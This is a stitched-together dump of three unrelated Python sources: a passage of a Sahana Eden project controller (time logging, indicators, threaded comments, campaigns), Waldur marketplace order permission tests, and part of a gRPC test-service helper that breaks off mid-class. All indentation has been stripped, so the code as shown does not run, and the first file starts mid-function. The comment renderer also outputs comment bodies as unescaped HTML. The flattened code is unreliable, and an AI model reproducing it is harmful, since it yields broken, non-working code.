# Display this user's Logged Hours in reverse-order
hide_filter = True
s3.crud_strings["project_time"].title_list = T("My Logged Hours")
person_id = auth.s3_logged_in_person()
if person_id:
# @ToDo: Use URL filter instead, but the Search page will have
# to populate it's widgets based on the URL filter
s3.filter = (table.person_id == person_id)
# Log time with just this user's open tasks visible
ttable = db.project_task
query = (ttable.pe_id == auth.user.pe_id) & \
(ttable.deleted == False)
if "update" not in request.args:
# Only log time against Open Tasks
query &= (ttable.status.belongs(s3db.project_task_active_statuses))
dbset = db(query)
table.task_id.requires = IS_ONE_OF(dbset, "project_task.id",
s3db.project_task_represent_w_project
)
list_fields = ["id",
"date",
"hours",
(T("Project"), "task_id$task_project.project_id"),
(T("Activity"), "task_id$task_activity.activity_id"),
"task_id",
"comments",
]
if settings.get_project_milestones():
# Use the field in this format to get the custom represent
list_fields.insert(5, (T("Milestone"), "task_id$task_milestone.milestone_id"))
s3db.configure("project_time",
list_fields = list_fields,
orderby = "project_time.date desc",
)
elif "week" in get_vars:
# Filter to the specified number of weeks
weeks = int(get_vars.get("week", 1))
now = request.utcnow
week = datetime.timedelta(days=7)
delta = week * weeks
s3.filter = (table.date > (now - delta))
elif "month" in get_vars:
# Filter to the specified number of months
months = int(get_vars.get("month", 1))
now = request.utcnow
month = datetime.timedelta(weeks=4)
delta = month * months
s3.filter = (table.date > (now - delta))
return s3_rest_controller(hide_filter=hide_filter)
# =============================================================================
# Programmes
# =============================================================================
def programme():
""" RESTful controller for Programmes """
return s3_rest_controller()
def programme_project():
""" RESTful controller for Programmes <> Projects """
s3.prep = lambda r: r.method == "options" and r.representation == "s3json"
return s3_rest_controller()
# =============================================================================
# Planning
# =============================================================================
def goal():
""" RESTful controller for Goals """
return s3_rest_controller()
def outcome():
""" RESTful controller for Outcomes """
return s3_rest_controller()
def output():
""" RESTful controller for Outputs """
return s3_rest_controller()
def indicator():
""" RESTful CRUD controller """
def prep(r):
if r.method == "profile":
# @ToDo: Needs Edit button
table = r.table
record = r.record
code = record.code
def dt_row_actions(component):
return lambda r, list_id: [
{"label": T("Open"),
"url": r.url(component=component,
component_id="[id]",
method="update.popup",
vars={"refresh": list_id}),
"_class": "action-btn edit s3_modal",
},
{"label": T("Delete"),
"_ajaxurl": r.url(component=component,
component_id="[id]",
method="delete.json",
),
"_class": "action-btn delete-btn-ajax dt-ajax-delete",
},
]
data_widget = dict(label = "Data",
label_create = "Add Data",
type = "datatable",
actions = dt_row_actions("indicator_data"),
tablename = "project_indicator_data",
filter = FS("indicator_id") == record.id,
create_controller = "project",
create_function = "indicator",
create_component = "indicator_data",
#icon = "book",
)
profile_widgets = [data_widget,
]
s3db.configure("project_indicator",
profile_cols = 1,
profile_header = DIV(H2(code),
H3(table.name.label),
P(record.name),
H3(table.verification.label),
P(record.verification),
_class="profile-header",
),
profile_title = "%s : %s" % (s3_unicode(s3.crud_strings["project_indicator"].title_display),
code),
profile_widgets = profile_widgets,
)
s3db.configure("project_indicator_data",
list_fields = ["name",
"end_date",
"target_value",
"value",
(T("Percentage"), "percentage"),
"comments",
],
)
s3.rfooter = A(T("Return to Project"),
_href=URL(f="project",
args=[record.project_id, "indicator"]),
_class = "action-btn"
)
elif r.component_name == "indicator_data":
field = s3db.project_indicator_data.project_id
field.default = r.record.project_id
field.readable = field.writable = False
return True
s3.prep = prep
return s3_rest_controller()
def indicator_data():
""" RESTful CRUD controller """
return s3_rest_controller()
def person():
""" RESTful controller for Community Volunteers """
# @ToDo: Filter
return s3db.vol_person_controller()
def volunteer():
""" RESTful controller for Community Volunteers """
# @ToDo: Filter
#s3.filter = FS("type") == 2
return s3db.vol_volunteer_controller()
# =============================================================================
# Comments
# =============================================================================
def comment_parse(comment, comments, task_id=None):
"""
Parse a Comment
@param: comment - a gluon.sql.Row: the current comment
@param: comments - a gluon.sql.Rows: full list of comments
@param: task_id - a reference ID: optional task commented on
"""
author = B(T("Anonymous"))
if comment.created_by:
utable = s3db.auth_user
ptable = s3db.pr_person
ltable = s3db.pr_person_user
query = (utable.id == comment.created_by)
left = [ltable.on(ltable.user_id == utable.id),
ptable.on(ptable.pe_id == ltable.pe_id)]
row = db(query).select(utable.email,
ptable.first_name,
ptable.middle_name,
ptable.last_name,
left=left, limitby=(0, 1)).first()
if row:
person = row.pr_person
user = row[utable._tablename]
username = s3_fullname(person)
email = user.email.strip().lower()
import hashlib
hash = hashlib.md5(email).hexdigest()
url = "http://www.gravatar.com/%s" % hash
author = B(A(username, _href=url, _target="top"))
if not task_id and comment.task_id:
table = s3db.project_task
task = "re: %s" % table[comment.task_id].name
header = DIV(author, " ", task)
task_id = comment.task_id
else:
header = author
thread = LI(DIV(s3base.s3_avatar_represent(comment.created_by),
DIV(DIV(header,
_class="comment-header"),
DIV(XML(comment.body),
_class="comment-body"),
_class="comment-text"),
DIV(DIV(comment.created_on,
_class="comment-date"),
DIV(A(T("Reply"),
_class="action-btn"),
_onclick="comment_reply(%i);" % comment.id,
_class="comment-reply"),
_class="fright"),
_id="comment-%i" % comment.id,
_task_id=task_id,
_class="comment-box"))
# Add the children of this thread
children = UL(_class="children")
id = comment.id
count = 0
for comment in comments:
if comment.parent == id:
count = 1
child = comment_parse(comment, comments, task_id=task_id)
children.append(child)
if count == 1:
thread.append(children)
return thread
# -----------------------------------------------------------------------------
def comments():
""" Function accessed by AJAX from rfooter to handle Comments """
try:
task_id = request.args[0]
except:
raise HTTP(400)
table = s3db.project_comment
field = table.task_id
field.default = task_id
field.writable = field.readable = False
# Create S3Request for S3SQLForm
r = s3_request(prefix="project",
name="comment",
# Override task_id
args=[],
vars=None,
# Override .loads
extension="html")
# Customise resource
r.customise_resource()
# Form to add a new Comment
form = s3base.S3SQLCustomForm("parent", "task_id", "body")(r)
# List of existing Comments
comments = db(field == task_id).select(table.id,
table.parent,
table.body,
table.created_by,
table.created_on)
output = UL(_id="comments")
for comment in comments:
if not comment.parent:
# Show top-level threads at top-level
thread = comment_parse(comment, comments, task_id=task_id)
output.append(thread)
script = "".join((
'''$('#comments').collapsible({xoffset:'-5',yoffset:'50',imagehide:img_path+'arrow-down.png',imageshow:img_path+'arrow-right.png',defaulthide:false})
$('#project_comment_parent__row1').hide()
$('#project_comment_parent__row').hide()
$('#project_comment_body').ckeditor(ck_config)
$('#submit_record__row input').click(function(){
$('#comment-form').hide()
$('#project_comment_body').ckeditorGet().destroy()
return true
})'''))
# No layout in this output!
#s3.jquery_ready.append(script)
output = DIV(output,
DIV(H4(T("New Post"),
_id="comment-title"),
form,
_id="comment-form",
_class="clear"),
SCRIPT(script))
return XML(output)
def comment():
""" RESTful CRUD controller """
return s3_rest_controller()
# =============================================================================
# Campaigns
# =============================================================================
def campaign():
""" RESTful CRUD controller """
return s3_rest_controller()
# -----------------------------------------------------------------------------
def campaign_keyword():
""" RESTful CRUD controller """
return s3_rest_controller()
# -----------------------------------------------------------------------------
def campaign_message():
""" RESTful CRUD controller """
return s3_rest_controller()
# -----------------------------------------------------------------------------
def campaign_response():
""" RESTful CRUD controller """
return s3_rest_controller()
# -----------------------------------------------------------------------------
def campaign_response_summary():
""" RESTful CRUD controller """
return s3_rest_controller()
# -----------------------------------------------------------------------------
def human_resource_project():
"""
REST controller for options.s3json lookups
"""
s3.prep = lambda r: r.method == "options" and r.representation == "s3json"
return s3_rest_controller()
# END =========================================================================
|
|
import datetime
from unittest import mock
from ddt import data, ddt
from freezegun import freeze_time
from rest_framework import status, test
from waldur_core.structure.models import CustomerRole
from waldur_core.structure.tests import factories as structure_factories
from waldur_core.structure.tests import fixtures
from waldur_mastermind.marketplace import models
from waldur_mastermind.marketplace.tasks import process_order
from waldur_mastermind.marketplace.tests import factories
from waldur_mastermind.marketplace.tests.factories import OFFERING_OPTIONS
from waldur_mastermind.marketplace.tests.helpers import override_marketplace_settings
from waldur_mastermind.marketplace_support import PLUGIN_NAME
@ddt
class OrderGetTest(test.APITransactionTestCase):
def setUp(self):
self.fixture = fixtures.ProjectFixture()
self.project = self.fixture.project
self.manager = self.fixture.manager
self.order = factories.OrderFactory(
project=self.project, created_by=self.manager
)
@data('staff', 'owner', 'admin', 'manager')
def test_orders_should_be_visible_to_colleagues_and_staff(self, user):
user = getattr(self.fixture, user)
self.client.force_authenticate(user)
url = factories.OrderFactory.get_list_url()
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.json()), 1)
@data('user')
def test_orders_should_be_invisible_to_other_users(self, user):
user = getattr(self.fixture, user)
self.client.force_authenticate(user)
url = factories.OrderFactory.get_list_url()
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.json()), 0)
def test_items_should_be_invisible_to_unauthenticated_users(self):
url = factories.OrderFactory.get_list_url()
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
@ddt
class OrderCreateTest(test.APITransactionTestCase):
def setUp(self):
self.fixture = fixtures.ProjectFixture()
self.project = self.fixture.project
@data('staff', 'owner', 'admin', 'manager')
def test_user_can_create_order_in_valid_project(self, user):
user = getattr(self.fixture, user)
response = self.create_order(user)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertTrue(models.Order.objects.filter(created_by=user).exists())
self.assertEqual(1, len(response.data['items']))
@data('user')
def test_user_can_not_create_order_in_invalid_project(self, user):
user = getattr(self.fixture, user)
response = self.create_order(user)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_user_can_not_create_item_if_offering_is_not_available(self):
offering = factories.OfferingFactory(state=models.Offering.States.ARCHIVED)
response = self.create_order(self.fixture.staff, offering)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_create_order_with_plan(self):
offering = factories.OfferingFactory(state=models.Offering.States.ACTIVE)
plan = factories.PlanFactory(offering=offering)
add_payload = {
'items': [
{
'offering': factories.OfferingFactory.get_url(offering),
'plan': factories.PlanFactory.get_url(plan),
'attributes': {},
},
]
}
response = self.create_order(
self.fixture.staff, offering, add_payload=add_payload
)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
@mock.patch('waldur_mastermind.marketplace.tasks.notify_order_approvers.delay')
def test_notification_is_sent_when_order_is_created(self, mock_task):
offering = factories.OfferingFactory(
state=models.Offering.States.ACTIVE, shared=True, billable=True
)
plan = factories.PlanFactory(offering=offering)
add_payload = {
'items': [
{
'offering': factories.OfferingFactory.get_url(offering),
'plan': factories.PlanFactory.get_url(plan),
'attributes': {},
},
]
}
response = self.create_order(
self.fixture.manager, offering, add_payload=add_payload
)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
mock_task.assert_called_once()
def test_can_not_create_order_if_offering_is_not_available_to_customer(self):
offering = factories.OfferingFactory(
state=models.Offering.States.ACTIVE, shared=False
)
offering.customer.add_user(self.fixture.owner, CustomerRole.OWNER)
plan = factories.PlanFactory(offering=offering)
add_payload = {
'items': [
{
'offering': factories.OfferingFactory.get_url(offering),
'plan': factories.PlanFactory.get_url(plan),
'attributes': {},
},
]
}
response = self.create_order(
self.fixture.owner, offering, add_payload=add_payload
)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_can_not_create_order_with_plan_related_to_another_offering(self):
offering = factories.OfferingFactory(state=models.Offering.States.ACTIVE)
plan = factories.PlanFactory(offering=offering)
add_payload = {
'items': [
{
'offering': factories.OfferingFactory.get_url(),
'plan': factories.PlanFactory.get_url(plan),
'attributes': {},
},
]
}
response = self.create_order(
self.fixture.staff, offering, add_payload=add_payload
)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_can_not_create_order_if_plan_max_amount_has_been_reached(self):
offering = factories.OfferingFactory(state=models.Offering.States.ACTIVE)
plan = factories.PlanFactory(offering=offering, max_amount=3)
factories.ResourceFactory.create_batch(3, plan=plan, offering=offering)
add_payload = {
'items': [
{
'offering': factories.OfferingFactory.get_url(offering),
'plan': factories.PlanFactory.get_url(plan),
'attributes': {},
},
]
}
response = self.create_order(
self.fixture.staff, offering, add_payload=add_payload
)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_user_can_create_order_with_valid_attributes_specified_by_options(self):
attributes = {
'storage': 1000,
'ram': 30,
'cpu_count': 5,
}
offering = factories.OfferingFactory(
state=models.Offering.States.ACTIVE, options=OFFERING_OPTIONS
)
plan = factories.PlanFactory(offering=offering)
add_payload = {
'items': [
{
'offering': factories.OfferingFactory.get_url(offering),
'plan': factories.PlanFactory.get_url(plan),
'attributes': attributes,
},
]
}
response = self.create_order(
self.fixture.staff, offering, add_payload=add_payload
)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(response.data['items'][0]['attributes'], attributes)
def test_user_can_not_create_order_with_invalid_attributes(self):
attributes = {
'storage': 'invalid value',
}
offering = factories.OfferingFactory(
state=models.Offering.States.ACTIVE, options=OFFERING_OPTIONS
)
plan = factories.PlanFactory(offering=offering)
add_payload = {
'items': [
{
'offering': factories.OfferingFactory.get_url(offering),
'plan': factories.PlanFactory.get_url(plan),
'attributes': attributes,
},
]
}
response = self.create_order(
self.fixture.staff, offering, add_payload=add_payload
)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_user_can_create_order_with_valid_limits(self):
limits = {
'storage': 1000,
'ram': 30,
'cpu_count': 5,
}
offering = factories.OfferingFactory(
state=models.Offering.States.ACTIVE, type=PLUGIN_NAME
)
plan = factories.PlanFactory(offering=offering)
for key in limits.keys():
models.OfferingComponent.objects.create(
offering=offering,
type=key,
billing_type=models.OfferingComponent.BillingTypes.LIMIT,
)
add_payload = {
'items': [
{
'offering': factories.OfferingFactory.get_url(offering),
'plan': factories.PlanFactory.get_url(plan),
'limits': limits,
'attributes': {},
},
]
}
response = self.create_order(
self.fixture.staff, offering, add_payload=add_payload
)
self.assertEqual(response.status_code, status.HTTP_201_CREATED, response.data)
order_item = models.OrderItem.objects.last()
self.assertEqual(order_item.limits['cpu_count'], 5)
def test_user_can_not_create_order_with_invalid_limits(self):
limits = {
'storage': 1000,
'ram': 30,
'cpu_count': 5,
}
offering = factories.OfferingFactory(state=models.Offering.States.ACTIVE)
plan = factories.PlanFactory(offering=offering)
for key in limits.keys():
models.OfferingComponent.objects.create(
offering=offering,
type=key,
billing_type=models.OfferingComponent.BillingTypes.FIXED,
)
add_payload = {
'items': [
{
'offering': factories.OfferingFactory.get_url(offering),
'plan': factories.PlanFactory.get_url(plan),
'limits': limits,
'attributes': {},
},
]
}
response = self.create_order(
self.fixture.staff, offering, add_payload=add_payload
)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_order_creating_is_not_available_for_blocked_organization(self):
user = self.fixture.owner
self.fixture.customer.blocked = True
self.fixture.customer.save()
response = self.create_order(user)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_user_can_create_order_if_terms_of_service_have_been_accepted(self):
user = self.fixture.admin
offering = factories.OfferingFactory(state=models.Offering.States.ACTIVE)
offering.terms_of_service = 'Terms of service'
offering.save()
add_payload = {
'items': [
{
'offering': factories.OfferingFactory.get_url(offering),
'attributes': {},
'accepting_terms_of_service': True,
},
]
}
response = self.create_order(user, offering=offering, add_payload=add_payload)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertTrue(models.Order.objects.filter(created_by=user).exists())
self.assertEqual(1, len(response.data['items']))
def test_user_can_create_order_if_terms_of_service_are_not_filled(self):
user = self.fixture.admin
offering = factories.OfferingFactory(state=models.Offering.States.ACTIVE)
add_payload = {
'items': [
{
'offering': factories.OfferingFactory.get_url(offering),
'attributes': {},
},
]
}
response = self.create_order(user, offering=offering, add_payload=add_payload)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertTrue(models.Order.objects.filter(created_by=user).exists())
self.assertEqual(1, len(response.data['items']))
def test_user_can_create_order_if_offering_is_not_shared(self):
user = self.fixture.admin
offering = factories.OfferingFactory(state=models.Offering.States.ACTIVE)
offering.shared = False
offering.customer = self.project.customer
offering.save()
add_payload = {
'items': [
{
'offering': factories.OfferingFactory.get_url(offering),
'attributes': {},
},
]
}
response = self.create_order(user, offering=offering, add_payload=add_payload)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertTrue(models.Order.objects.filter(created_by=user).exists())
self.assertEqual(1, len(response.data['items']))
def test_user_cannot_create_order_if_terms_of_service_have_been_not_accepted(self):
user = self.fixture.admin
offering = factories.OfferingFactory(state=models.Offering.States.ACTIVE)
offering.terms_of_service = 'Terms of service'
offering.save()
add_payload = {
'items': [
{
'offering': factories.OfferingFactory.get_url(offering),
'attributes': {},
},
]
}
response = self.create_order(user, offering=offering, add_payload=add_payload)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(
str(response.content, 'utf-8'),
'{"items":["Terms of service for offering \'%s\' have not been accepted."]}'
% offering,
)
self.assertFalse(models.Order.objects.filter(created_by=user).exists())
def test_user_cannot_create_order_in_project_is_expired(self):
user = getattr(self.fixture, 'staff')
self.project.end_date = datetime.datetime(day=1, month=1, year=2020)
self.project.save()
with freeze_time('2020-01-01'):
response = self.create_order(user)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_if_divisions_do_not_match_order_validation_fails(self):
user = self.fixture.staff
offering = factories.OfferingFactory(state=models.Offering.States.ACTIVE)
division = structure_factories.DivisionFactory()
offering.divisions.add(division)
response = self.create_order(user, offering)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_if_divisions_match_order_validation_passes(self):
user = self.fixture.staff
offering = factories.OfferingFactory(state=models.Offering.States.ACTIVE)
division = structure_factories.DivisionFactory()
offering.divisions.add(division)
self.fixture.customer.division = division
self.fixture.customer.save()
response = self.create_order(user, offering)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertTrue(models.Order.objects.filter(created_by=user).exists())
self.assertEqual(1, len(response.data['items']))
def create_order(self, user, offering=None, add_payload=None):
if offering is None:
offering = factories.OfferingFactory(state=models.Offering.States.ACTIVE)
self.client.force_authenticate(user)
url = factories.OrderFactory.get_list_url()
payload = {
'project': structure_factories.ProjectFactory.get_url(self.project),
'items': [
{
'offering': factories.OfferingFactory.get_url(offering),
'attributes': {},
},
],
}
if add_payload:
payload.update(add_payload)
return self.client.post(url, payload)
@ddt
class OrderApproveTest(test.APITransactionTestCase):
def setUp(self):
self.fixture = fixtures.ProjectFixture()
self.project = self.fixture.project
self.manager = self.fixture.manager
self.order = factories.OrderFactory(
project=self.project, created_by=self.manager
)
self.url = factories.OrderFactory.get_url(self.order, 'approve')
def test_owner_can_approve_order(self):
self.ensure_user_can_approve_order(self.fixture.owner)
def test_by_default_manager_can_not_approve_order(self):
self.ensure_user_can_not_approve_order(self.fixture.manager)
def test_by_default_admin_can_not_approve_order(self):
self.ensure_user_can_not_approve_order(self.fixture.admin)
@override_marketplace_settings(MANAGER_CAN_APPROVE_ORDER=True)
def test_manager_can_approve_order_if_feature_is_enabled(self):
self.ensure_user_can_approve_order(self.fixture.manager)
@override_marketplace_settings(ADMIN_CAN_APPROVE_ORDER=True)
def test_admin_can_approve_order_if_feature_is_enabled(self):
self.ensure_user_can_approve_order(self.fixture.admin)
def test_user_can_not_reapprove_active_order(self):
self.order.state = models.Order.States.EXECUTING
self.order.save()
response = self.approve_order(self.fixture.owner)
self.assertEqual(response.status_code, status.HTTP_409_CONFLICT)
self.assertEqual(self.order.approved_by, None)
def test_order_approving_is_not_available_for_blocked_organization(self):
self.order.project.customer.blocked = True
self.order.project.customer.save()
response = self.approve_order(self.fixture.owner)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@mock.patch('waldur_mastermind.marketplace.tasks.process_order.delay')
def test_when_order_with_basic_offering_is_approved_resource_is_marked_as_ok(
self, mocked_delay
):
mocked_delay.side_effect = process_order
offering = factories.OfferingFactory(
customer=self.fixture.customer, type='Marketplace.Basic'
)
order_item = factories.OrderItemFactory(offering=offering, order=self.order)
self.approve_order(self.fixture.owner)
order_item.refresh_from_db()
self.assertEqual(order_item.resource.state, models.Resource.States.OK)
def test_user_cannot_approve_order_if_project_is_expired(self):
self.project.end_date = datetime.datetime(year=2020, month=1, day=1).date()
self.project.save()
with freeze_time('2020-01-01'):
response = self.approve_order(self.fixture.staff)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def approve_order(self, user):
self.client.force_authenticate(user)
response = self.client.post(self.url)
self.order.refresh_from_db()
return response
def ensure_user_can_approve_order(self, user):
response = self.approve_order(user)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(self.order.approved_by, user)
def ensure_user_can_not_approve_order(self, user):
response = self.approve_order(user)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertEqual(self.order.approved_by, None)
@ddt
class OrderRejectTest(test.APITransactionTestCase):
def setUp(self):
self.fixture = fixtures.ProjectFixture()
self.project = self.fixture.project
self.manager = self.fixture.manager
self.order = factories.OrderFactory(
project=self.project, created_by=self.manager
)
self.order_item_1 = factories.OrderItemFactory(order=self.order)
self.order_item_2 = factories.OrderItemFactory(order=self.order)
self.url = factories.OrderFactory.get_url(self.order, 'reject')
@data('staff', 'manager', 'admin', 'owner')
def test_authorized_user_can_reject_order(self, user):
self.client.force_authenticate(getattr(self.fixture, user))
response = self.client.post(self.url)
for obj in [self.order, self.order_item_1, self.order_item_2]:
obj.refresh_from_db()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(self.order.state, models.Order.States.REJECTED)
self.assertEqual(self.order_item_1.state, models.OrderItem.States.TERMINATED)
self.assertEqual(self.order_item_2.state, models.OrderItem.States.TERMINATED)
def test_support_users_can_not_reject_order(self):
self.client.force_authenticate(self.fixture.global_support)
response = self.client.post(self.url)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_can_not_reject_unrequested_order(self):
self.client.force_authenticate(self.fixture.staff)
self.order.approve()
self.order.save()
response = self.client.post(self.url)
self.assertEqual(response.status_code, status.HTTP_409_CONFLICT)
def test_order_rejecting_is_not_available_for_blocked_organization(self):
self.order.project.customer.blocked = True
self.order.project.customer.save()
self.client.force_authenticate(self.fixture.manager)
response = self.client.post(self.url)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@ddt
class OrderDeleteTest(test.APITransactionTestCase):
def setUp(self):
self.fixture = fixtures.ProjectFixture()
self.project = self.fixture.project
self.manager = self.fixture.manager
self.order = factories.OrderFactory(
project=self.project, created_by=self.manager
)
@data('staff', 'owner')
def test_owner_and_staff_can_delete_order(self, user):
response = self.delete_order(user)
self.assertEqual(
response.status_code, status.HTTP_204_NO_CONTENT, response.data
)
self.assertFalse(models.Order.objects.filter(created_by=self.manager).exists())
@data('admin', 'manager')
def test_other_colleagues_can_not_delete_order(self, user):
response = self.delete_order(user)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertTrue(models.Order.objects.filter(created_by=self.manager).exists())
@data('user')
def test_other_user_can_not_delete_order(self, user):
response = self.delete_order(user)
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
self.assertTrue(models.Order.objects.filter(created_by=self.manager).exists())
def test_order_deleting_is_not_available_for_blocked_organization(self):
self.fixture.customer.blocked = True
self.fixture.customer.save()
response = self.delete_order('owner')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def delete_order(self, user):
user = getattr(self.fixture, user)
self.client.force_authenticate(user)
url = factories.OrderFactory.get_url(self.order)
response = self.client.delete(url)
return response
class OrderStateTest(test.APITransactionTestCase):
def test_switch_order_state_to_done_when_all_order_items_are_processed(self):
order_item = factories.OrderItemFactory(state=models.OrderItem.States.EXECUTING)
order = order_item.order
order.state = models.Order.States.EXECUTING
order.save()
order_item.state = models.OrderItem.States.DONE
order_item.save()
order.refresh_from_db()
self.assertEqual(order.state, models.Order.States.DONE)
def test_not_switch_order_state_to_done_when_not_all_order_items_are_processed(
self,
):
order_item = factories.OrderItemFactory(state=models.OrderItem.States.EXECUTING)
order = order_item.order
factories.OrderItemFactory(state=models.OrderItem.States.EXECUTING, order=order)
order.state = models.Order.States.EXECUTING
order.save()
order_item.state = models.OrderItem.States.DONE
order_item.save()
order.refresh_from_db()
self.assertEqual(order.state, models.Order.States.EXECUTING)
|
|
# Copyright 2015 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Code for making a service.TestService more amenable to use in tests."""
import collections
import threading
import six
# test_control, _service, and test_interfaces are referenced from specification
# in this module.
from grpc.framework.common import cardinality
from grpc.framework.common import style
from grpc.framework.foundation import stream
from grpc.framework.foundation import stream_util
from grpc.framework.interfaces.face import face
from tests.unit.framework.common import test_control # pylint: disable=unused-import
from tests.unit.framework.interfaces.face import _service # pylint: disable=unused-import
from tests.unit.framework.interfaces.face import test_interfaces # pylint: disable=unused-import
_IDENTITY = lambda x: x
class TestServiceDigest(
collections.namedtuple('TestServiceDigest', (
'methods', 'inline_method_implementations',
'event_method_implementations', 'multi_method_implementation',
'unary_unary_messages_sequences', 'unary_stream_messages_sequences',
'stream_unary_messages_sequences',
'stream_stream_messages_sequences',))):
"""A transformation of a service.TestService.
Attributes:
methods: A dict from method group-name pair to test_interfaces.Method object
describing the RPC methods that may be called during the test.
inline_method_implementations: A dict from method group-name pair to
face.MethodImplementation object to be used in tests of in-line calls to
behaviors under test.
event_method_implementations: A dict from method group-name pair to
face.MethodImplementation object to be used in tests of event-driven calls
to behaviors under test.
multi_method_implementation: A face.MultiMethodImplementation to be used in
tests of generic calls to behaviors under test.
unary_unary_messages_sequences: A dict from method group-name pair to
sequence of service.UnaryUnaryTestMessages objects to be used to test the
identified method.
unary_stream_messages_sequences: A dict from method group-name pair to
sequence of service.UnaryStreamTestMessages objects to be used to test the
identified method.
stream_unary_messages_sequences: A dict from method group-name pair to
sequence of service.StreamUnaryTestMessages objects to be used to test the
identified method.
stream_stream_messages_sequences: A dict from method group-name pair to
sequence of service.StreamStreamTestMessages objects to be used to test
the identified method.
"""
class _BufferingConsumer(stream.Consumer):
"""A trivial Consumer that dumps what it consumes in a user-mutable buffer."""
def __init__(self):
self.consumed = []
self.terminated = False
def consume(self, value):
self.consumed.append(value)
def terminate(self):
self.terminated = True
def consume_and_terminate(self, value):
self.consumed.append(value)
self.terminated = True
class _InlineUnaryUnaryMethod(face.MethodImplementation):
def __init__(self, unary_unary_test_method, control):
self._test_method = unary_unary_test_method
self._control = control
self.cardinality = cardinality.Cardinality.UNARY_UNARY
self.style = style.Service.INLINE
def unary_unary_inline(self, request, context):
response_list = []
self._test_method.service(request, response_list.append, context,
self._control)
return response_list.pop(0)
class _EventUnaryUnaryMethod(face.MethodImplementation):
def __init__(self, unary_unary_test_method, control, pool):
self._test_method = unary_unary_test_method
self._control = control
self._pool = pool
self.cardinality = cardinality.Cardinality.UNARY_UNARY
self.style = style.Service.EVENT
def unary_unary_event(self, request, response_callback, context):
if self._pool is None:
self._test_method.service(request, response_callback, context,
self._control)
else:
self._pool.submit(self._test_method.service, request,
response_callback, context, self._control)
class _InlineUnaryStreamMethod(face.MethodImplementation):
def __init__(self, unary_stream_test_method, control):
self._test_method = unary_stream_test_method
self._control = control
self.cardinality = cardinality.Cardinality.UNARY_STREAM
self.style = style.Service.INLINE
def unary_stream_inline(self, request, context):
response_consumer = _BufferingConsumer()
self._test_method.service(request, response_consumer, context,
self._control)
for response in response_consumer.consumed:
yield response
class _EventUnaryStreamMethod(face.MethodImplementation):
def __init__(self, unary_stream_test_method, control, pool):
self._test_method = unary_stream_test_method
self._control = control
self._pool = pool
self.cardinality = cardinality.Cardinality.UNARY_STREAM
self.style = style.Service.EVENT
def unary_stream_event(self, request, response_consumer, context):
if self._pool is None:
self._test_method.service(request, response_consumer, context,
self._control)
else:
self._pool.submit(self._test_method.service, request,
response_consumer, context, self._control)
class _InlineStreamUnaryMethod(face.MethodImplementation):
def __init__(self, stream_unary_test_method, control):
self._test_method = stream_unary_test_method
self._control = control
self.cardinality = cardinality.Cardinality.STREAM_UNARY
self.style = style.Service.INLINE
def stream_unary_inline(self, request_iterator, context):
response_list = []
request_consumer = self._test_method.service(response_list.append,
context, self._control)
for request in request_iterator:
request_consumer.consume(request)
request_consumer.terminate()
return response_list.pop(0)
class _EventStreamUnaryMethod(face.MethodImplementation):
def __init__(self, stream_unary_test_method, control, pool):
self._test_method = stream_unary_test_method
self._control = control
self._pool = pool
self.cardinality = cardinality.Cardinality.STREAM_UNARY
self.style = style.Service.EVENT
def stream_unary_event(self, response_callback, context):
request_consumer = self._test_method.service(response_callback, context,
self._control)
if self._pool is None:
return request_consumer
else:
return stream_util.ThreadSwitchingConsumer(request_consumer,
self._pool)
class _InlineStreamStreamMethod(face.MethodImplementation):
def __init__(self, stream_stream_test_method, control):
self._test_method = stream_stream_test_method
self._control = control
self.cardinality = cardinality.Cardinality.STREAM_STREAM
self.style = style.Service.INLINE
def stream_stream_inline(self, request_iterator, context):
response_consumer = _BufferingConsumer()
request_consumer = self._test_method.service(response_consumer, context,
self._control)
for request in request_iterator:
request_consumer.consume(request)
while response_consumer.consumed:
yield response_consumer.consumed.pop(0)
response_consumer.terminate()
class _EventStreamStreamMethod(face.MethodImplementation):
def __init__(self, stream_stream_test_method, control, pool):
self._test_method = stream_stream_test_method
self._control = control
self._pool = pool
self.cardinality = cardinality.Cardinality.STREAM_STREAM
